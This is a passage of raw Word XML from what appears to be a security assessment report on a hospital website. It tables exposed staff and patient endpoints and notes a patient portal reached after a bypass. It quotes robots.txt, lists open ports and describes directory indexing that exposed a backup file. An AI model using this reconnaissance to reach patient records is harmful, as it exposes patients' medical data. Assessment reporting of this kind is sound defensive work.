            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/staff/login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Staff authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Restricted surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/patient/portal.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authenticated patient portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reached after bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/patient/download.php?id=n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient document retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive object access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/old/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Legacy/backup directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directly exposed backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/patient/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient directory listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File and endpoint enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/staff/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Staff directory listing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Restricted endpoint enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>5.3 robots.txt and sitemap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>robots.txt explicitly disallowed /patient/, /staff/ and /old/. This is not an access-control mechanism: the directories remained externally reachable and, in the observed cases, indexable. The sitemap contained public pages and omitted those restricted paths. The combination demonstrates why crawler directives should never be relied upon to protect sensitive resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:after="120"/>
        <w:ind w:left="259" w:right="259"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>User-agent: *</w:t>
        <w:br/>
        <w:t>Disallow: /patient/</w:t>
        <w:br/>
        <w:t>Disallow: /staff/</w:t>
        <w:br/>
        <w:t>Disallow: /old/</w:t>
        <w:br/>
        <w:t>Sitemap: https://medirozahospital.com/sitemap.xml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Network service exposure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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed service / behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Treatment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Pure-FTPd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>BIND/DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HAProxy/openresty; direct-IP 403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dovecot POP3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dovecot IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HAProxy/openresty; TLS; direct-IP 403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Primary web path by hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>465</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SMTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>587</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exim submission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>993</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>IMAPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>995</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>POP3S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2077</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cPanel/management redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2091</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cPanel/management; unauthorized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Two full TCP scans differed: the first reported 13 open ports and the later repeat reported eight. The report retains that discrepancy because it is part of the evidence. Shared hosting, filtering and transient load-balancer behavior can change what is visible between scans. No unsupported conclusion is drawn from the difference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>F-01 — Unauthenticated directory indexing on /old/, /patient/ and /staff/</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CRITICALITY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="FFEDD5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="D97706"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CWE-548</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Directory indexing converts a web root from a known application surface into a browsable file inventory. In this assessment, /old/, /patient/ and /staff/ exposed directory listings. The listing under /old/ was particularly consequential because it revealed a backup filename that could then be requested directly. The /patient/ listing exposed download.php, portal.php, login.php, logout.php and an error_log file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker does not need to guess endpoint names when the server supplies them. Enumeration reduces attack complexity and reveals legacy artifacts that are normally expected to be unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
